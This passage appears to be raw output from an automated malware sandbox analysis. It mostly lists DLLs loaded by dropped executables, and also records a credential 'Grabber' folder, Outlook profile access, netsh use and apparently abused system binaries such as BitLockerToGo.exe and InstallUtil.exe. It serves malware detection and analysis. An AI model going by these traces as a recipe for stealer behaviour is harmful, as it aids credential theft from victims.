Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dbghelp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1023276001\UfEglUg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.8.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\1023073001\t0IHakP.exe

File written: C:\Users\user\AppData\Local\af1ff33f0ccf8b3d2eb36b35b7549ce0\user@051829_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: i8Vwc7iOaG.exe

Static file information: File size 1841664 > 1048576

Source: i8Vwc7iOaG.exe

Static PE information: Raw size of niowkeag is bigger than: 0x100000 < 0x197800

Source:	Binary string: mozglue.pdbP source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164958617.000000006F86D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: wextract.pdb source: ukX1YE2.exe, 00000018.00000002.3837951089.00007FF7C81A9000.00000002.00000001.01000000.00000014.sdmp, ukX1YE2.exe, 00000018.00000000.3351409977.00007FF7C81A9000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb@ source: Y71AV1VIPLT8Y663WBDXSB.exe, 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wextract.pdbGCTL source: ukX1YE2.exe, 00000018.00000002.3837951089.00007FF7C81A9000.00000002.00000001.01000000.00000014.sdmp, ukX1YE2.exe, 00000018.00000000.3351409977.00007FF7C81A9000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: BitLockerToGo.pdb source: 52ba7a538c.exe, 00000014.00000002.3410807562.0000000001F12000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5D40000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3781370617.000001C5A5C81000.00000004.00000800.00020000.00000000.sdmp, soonmaintain.exe, 00000019.00000002.3787425416.000001C5AE710000.00000004.08000000.00040000.00000000.sdmp
